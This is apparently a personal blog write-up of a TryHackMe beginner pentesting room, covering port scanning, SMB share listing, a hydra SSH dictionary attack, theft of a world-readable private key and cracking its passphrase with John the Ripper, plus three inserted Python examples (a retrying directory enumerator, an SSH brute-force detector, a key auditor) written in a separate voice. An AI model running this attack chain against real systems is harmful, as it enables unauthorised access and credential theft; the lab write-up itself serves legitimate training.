Reading "7日間でハッキングを始める本" (Day 1, Day 2)

Environment setup
The book assumes VirtualBox on Windows.
I want to run Kali in OrbStack instead.

Reference
Success

The book works in nano,
but for some reason it isn't installed.
vim
is there, so that'll do.

Keyboard settings
No matter how many times I try, I can't type _.
With the US keyboard layout it works, so that solved it.
The Mac itself is JIS, but I'm using an external US keyboard, so that's fine.

When a JIS MacBook is treated as US layout, you can't type ~.

Day 1
Room
Tutorial Room
Just hit the target server's IP address from Firefox inside Kali.
It's a private 10.xx.xx.xx address, so OpenVPN is required.

Day 2
Room
Basic Pentesting Room
To do
- port scan
- dictionary attack

Ran into a problem where the Start Machine
button couldn't be clicked.
In F12 the button is there, but the cursor never lands on it.
Forced it from the Developer Console with
btn = document.getElementById("start-machine-button-1")
btn.click()
and it clicked (lol).
Probably a TryHackMe bug.

Port scan
$ nmap -sV -Pn -oN nmap.txt -v 10.10.201.17
$ cat nmap.txt
# Nmap 7.95 scan initiated Fri Jul 25 00:04:11 2025 as: /usr/lib/nmap/nmap --privileged -sV -Pn -oN nmap.txt -v 10.10.201.17
Nmap scan report for 10.10.201.17
Host is up (0.39s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 25 00:05:00 2025 -- 1 IP address (1 host up) scanned in 49.83 seconds

$ dirb http://10.10.201.17 /usr/share/dirb/wordlists/small.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Jul 25 00:15:35 2025
URL_BASE: http://10.10.201.17/
WORDLIST_FILES: /usr/share/dirb/wordlists/small.txt
-----------------
GENERATED WORDS: 959
---- Scanning URL: http://10.10.201.17/ ----
==> DIRECTORY: http://10.10.201.17/development/
(!) FATAL: Too many errors connecting to host
(Possible cause: OPERATION TIMEOUT)
-----------------
END_TIME: Fri Jul 25 00:24:48 2025
DOWNLOADED: 403 - FOUND: 0
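dirb died above with "Too many errors connecting to host" after finding only /development/; against a target showing 0.39 s latency over the VPN, that is a timeout problem rather than anything on the target. Here is an added example (my own code, not the scrap's and not dirb's) of the behaviour you want in that situation: one timeout per request, transient failures retried with exponential backoff, and words that still fail handed back for a re-run instead of aborting the whole scan. The fetcher is injectable so the retry logic can be exercised without a network; the URL and wordlist path in the usage line are assumptions taken from the scan above.

```python
"""Added example: a minimal directory brute-forcer that survives a lagging link."""
import sys
import time
import urllib.error
import urllib.request


class Transient(Exception):
    """A timeout or connection error that is worth retrying."""


def urllib_fetch(url, timeout=10.0):
    """Return the HTTP status code for url; network failures become Transient."""
    req = urllib.request.Request(url, headers={"User-Agent": "dir-enum-example/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code                      # 404/403/... are answers, not failures
    except (urllib.error.URLError, OSError) as e:
        raise Transient(str(e)) from e


def enumerate_dirs(base, words, fetch=urllib_fetch, retries=3, backoff=1.0,
                   interesting=(200, 204, 301, 302, 307, 401, 403)):
    """Probe base/<word>/ for every word in the list.

    Returns (found, gave_up):
      found   -> {url: status} for responses whose status is in `interesting`
      gave_up -> words that failed `retries` times in a row (re-run these later)
    """
    base = base.rstrip("/") + "/"
    found, gave_up = {}, []
    for word in words:
        url = base + word.strip("/") + "/"
        for attempt in range(retries):
            try:
                status = fetch(url)
            except Transient:
                # exponential backoff (backoff, 2*backoff, 4*backoff ...) instead of
                # hammering a link that is already dropping requests
                time.sleep(backoff * (2 ** attempt))
                continue
            if status in interesting:
                found[url] = status
            break
        else:                              # loop exhausted without a single answer
            gave_up.append(word)
    return found, gave_up


if __name__ == "__main__":
    # usage (assumed paths): python3 dir_enum.py http://10.10.201.17 /usr/share/dirb/wordlists/small.txt
    target, wordlist = sys.argv[1], sys.argv[2]
    with open(wordlist) as f:
        words = [w.strip() for w in f if w.strip()]
    found, gave_up = enumerate_dirs(target, words, retries=4, backoff=2.0)
    for url, status in found.items():
        print(f"{status} {url}")
    print(f"# {len(gave_up)} words gave up after retries", file=sys.stderr)
```

The point is the `for ... else`: a word is only written off after every retry raised, and even then it lands in `gave_up` rather than terminating the run, so a ten-minute scan over a flaky tunnel still produces a partial result you can act on.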

$ smbclient -L 10.10.203.123
Password for [WORKGROUP\~~~~~~~~~]:
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.15.13-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 10.10.203.123 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

$ smbclient \\\\10.10.203.123\\Anonymous
Password for [WORKGROUP\~~~~~~~~]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Apr 20 02:31:20 2018
.. D 0 Fri Apr 20 02:13:06 2018
staff.txt N 173 Fri Apr 20 02:29:55 2018
14282840 blocks of size 1024. 6248192 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
$ ls
nmap.txt staff.txt
$ cat staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay

Jan's
password is apparently weak.

The attack is supposed to use a password list called rockyou.txt
that ships with Kali, but there's no such file.
The nmap
and smbclient
used so far also had to be installed one by one, so the Kali installed via OrbStack seems to be missing a lot.

GPT-sama: "Run sudo apt install kali-linux-large."
tactical-k: "Okay, will do."

That command fixed it.

$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.138.120 -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-29 22:16:21
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.138.120:22/
[STATUS] 48.00 tries/min, 48 tries in 00:01h, 14344351 to do in 4980:41h, 4 active
[STATUS] 51.00 tries/min, 153 tries in 00:03h, 14344246 to do in 4687:40h, 4 active
[STATUS] 49.57 tries/min, 347 tries in 00:07h, 14344052 to do in 4822:42h, 4 active
[STATUS] 50.80 tries/min, 762 tries in 00:15h, 14343637 to do in 4705:56h, 4 active
[22][ssh] host: 10.10.138.120 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-07-29 22:31:49
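Two things to read off that output before moving on. hydra's own [STATUS] lines show about 50 tries per minute with -t 4, which is why it estimates roughly 4,700 hours for all 14,344,399 rockyou entries; the run only finished in 15 minutes because "armando" sits around the 760th line of the list. And on the target, every one of those tries is a "Failed password" line in sshd's log, which is exactly what a detection rule keys on. The following is an added example of that rule, my code rather than anything from the scrap, the book or hydra: it parses OpenSSH auth.log lines, alerts when one source exceeds a failure threshold inside a sliding window, and raises a second, higher-severity alert when that same source is then accepted. The log lines are constructed for this example, with the hostname and username borrowed from the session above and invented source IPs.

```python
"""Added example: SSH dictionary-attack detection over auth.log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_auth_line(line, year=2025):
    """Return (timestamp, result, user, ip) or None for lines we do not care about.
    syslog timestamps carry no year, so the caller supplies it."""
    m = AUTH_RE.match(line.rstrip("\n"))
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_ssh_bruteforce(lines, threshold=10, window_s=60):
    """Return a list of (kind, ip, detail) alerts.

    kind == "bruteforce"         : >= threshold failures from ip within window_s seconds
    kind == "bruteforce_success" : an Accepted login from an ip that already tripped the
                                   threshold; this is the one worth paging on
    """
    window = timedelta(seconds=window_s)
    failures = defaultdict(deque)          # ip -> timestamps of failures still in window
    tripped = set()
    alerts = []
    for line in lines:
        rec = parse_auth_line(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        q = failures[ip]
        while q and ts - q[0] > window:     # slide the window forward
            q.popleft()
        if result == "Failed":
            q.append(ts)
            if len(q) >= threshold and ip not in tripped:
                tripped.add(ip)
                alerts.append(("bruteforce", ip, f"{len(q)} failed logins within {window_s}s"))
        elif ip in tripped:
            alerts.append(("bruteforce_success", ip,
                           f"'{user}' accepted after {len(q)} recent failures"))
    return alerts


def sample_log():
    """Constructed auth.log excerpt (not real logs): a hydra-like burst at about one
    try per second that ends in success, and one user who mistypes twice."""
    host = "ip-10-10-138-120"
    lines = []
    for i in range(12):
        lines.append(f"Jul 29 22:16:{25 + i:02d} {host} sshd[1402]: Failed password for jan "
                     f"from 10.9.1.23 port {51000 + i} ssh2")
    lines.append(f"Jul 29 22:16:40 {host} sshd[1402]: Accepted password for jan "
                 f"from 10.9.1.23 port 51040 ssh2")
    lines.append(f"Jul 29 22:20:01 {host} sshd[1500]: Failed password for kay from 10.9.5.5 port 40001 ssh2")
    lines.append(f"Jul 29 22:20:05 {host} sshd[1500]: Failed password for invalid user kayy from 10.9.5.5 port 40002 ssh2")
    lines.append(f"Jul 29 22:20:09 {host} sshd[1500]: Accepted password for kay from 10.9.5.5 port 40003 ssh2")
    lines.append(f"Jul 29 22:20:10 {host} CRON[1600]: pam_unix(cron:session): session opened for user root")
    return lines


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(sample_log()):
        print(alert)
```

Threshold and window are the knobs to tune: hydra at -t 4 produced about one failure per second here, so a 60-second window catches it easily, while the second source (two typos, then success) never trips. Note that hydra also reuses connections, so counting distinct connections would undercount; counting "Failed password" lines per source does not.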

The important part
[22][ssh] host: 10.10.138.120 login: jan password: armando

$ ssh jan@10.10.138.120
The authenticity of host '10.10.138.120 (10.10.138.120)' can't be established.
ED25519 key fingerprint is SHA256:+CWwhGUluZFGjcxouDqD2X6tBduKYivX449ysO0khvo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.138.120' (ED25519) to the list of known hosts.
jan@10.10.138.120's password:
Enter
armando
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@ip-10-10-138-120:~$

The book ends here.
The room's questions continue.

jan@ip-10-10-138-120:~$ ls -al /home/kay/.ssh/
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
kay's
private key is readable.
Copy the contents and save them locally as kay_id_rsa.

Crack the passphrase with John the Ripper
# ssh2john.py
# converts the key into a hash format john understands
python3 /usr/share/john/ssh2john.py kay_id_rsa > hash.txt
# run the wordlist against the converted hash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Result
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxxxx (kay_id_rsa)
1g 0:00:00:00 DONE (2025-07-29 23:25) 3.846g/s 318276p/s 318276c/s 318276C/s bird..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
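Two lines in that john output explain why the passphrase fell in well under a second: "Cost 1 (KDF/cipher ...) is 0" and "Cost 2 (iteration count) is 1". kay's id_rsa is a legacy PEM key ("Proc-Type: 4,ENCRYPTED"), whose AES key is derived from the passphrase with a single MD5 pass and no tunable cost, so john can test over 300k candidates per second. Keys in the newer openssh-key-v1 format (what ssh-keygen writes by default now, or with -o on older versions) use bcrypt with a rounds counter (-a) instead. The other lesson is the 0644 mode on the key: jan only got this far because the file was world-readable. Below is an added example, my own code rather than anything from the scrap, John or ssh2john, that checks both points for a key file; the sample keys it builds are constructed and hold no real key material. One practical caveat for the next step: the copied key also has to be chmod 600 on the Kali side, or ssh -i will refuse it as "too open".

```python
"""Added example: audit an SSH private key for file mode and passphrase KDF."""
import base64
import hashlib
import os
import stat
import struct
import sys

# Constructed sample: header of a legacy encrypted PEM key; the body is filler, not a key.
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

Y29uc3RydWN0ZWQgc2FtcGxlIGJvZHksIG5vdCBhIHJlYWwga2V5
-----END RSA PRIVATE KEY-----
"""


def evp_bytes_to_key_md5(passphrase: bytes, iv_hex: str, key_len: int = 16) -> bytes:
    """OpenSSL's legacy KDF for PEM keys: D_i = MD5(D_{i-1} || passphrase || salt), with
    salt = first 8 bytes of the DEK-Info IV and one iteration. One MD5 per candidate
    is the whole cost, hence john's ~318k passphrases/s above."""
    salt = bytes.fromhex(iv_hex)[:8]
    out, prev = b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + passphrase + salt).digest()
        out += prev
    return out[:key_len]


def _string(b: bytes) -> bytes:
    """SSH wire 'string': uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def make_openssh_key_text(cipher=b"aes256-ctr", kdf=b"bcrypt", salt=b"\x00" * 16, rounds=16):
    """Constructed openssh-key-v1 blob: the header fields are laid out as the real format
    is, but the public/private sections are placeholders (useless to ssh, enough here)."""
    kdfopts = _string(salt) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = (b"openssh-key-v1\x00" + _string(cipher) + _string(kdf) + _string(kdfopts)
            + struct.pack(">I", 1) + _string(b"placeholder-pub") + _string(b"placeholder-priv"))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


def describe_key(pem_text: str) -> dict:
    """Classify a private key's on-disk format and how its passphrase (if any) is stretched."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(magic))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        info = {"format": "openssh-key-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "encrypted": kdf != b"none"}
        if kdf == b"bcrypt":                       # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            info["rounds"] = struct.unpack(">I", kdfopts[o:o + 4])[0]
        return info
    headers = {}                                   # legacy PEM: "Key: value" lines, then blank
    for l in lines[1:]:
        if ":" not in l:
            break
        k, v = l.split(":", 1)
        headers[k.strip()] = v.strip()
    if headers.get("Proc-Type") == "4,ENCRYPTED":
        cipher, _iv = headers["DEK-Info"].split(",")
        return {"format": "pem", "cipher": cipher, "kdf": "md5-1-iteration", "encrypted": True}
    return {"format": "pem", "cipher": None, "kdf": None, "encrypted": False}


def audit_key_file(path: str) -> dict:
    """describe_key() plus the mode check that would have kept jan out of kay's key."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path) as f:
        info = describe_key(f.read())
    info["mode"] = oct(mode)
    info["readable_by_others"] = bool(mode & (stat.S_IRGRP | stat.S_IROTH))
    return info


if __name__ == "__main__":
    print(audit_key_file(sys.argv[1]))     # e.g. python3 key_audit.py kay_id_rsa
```

Run against the copied kay_id_rsa it reports format "pem", kdf "md5-1-iteration" and, before the chmod, readable_by_others True; a key written by a current ssh-keygen with a passphrase reports "bcrypt" with its rounds count, and each extra round multiplies the cracker's work accordingly.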

Passphrase captured (the xxxxxxxx
part).

# ssh login as kay
$ ssh -i kay_id_rsa kay@10.10.138.120
$ cat pass.bak
{{final password}}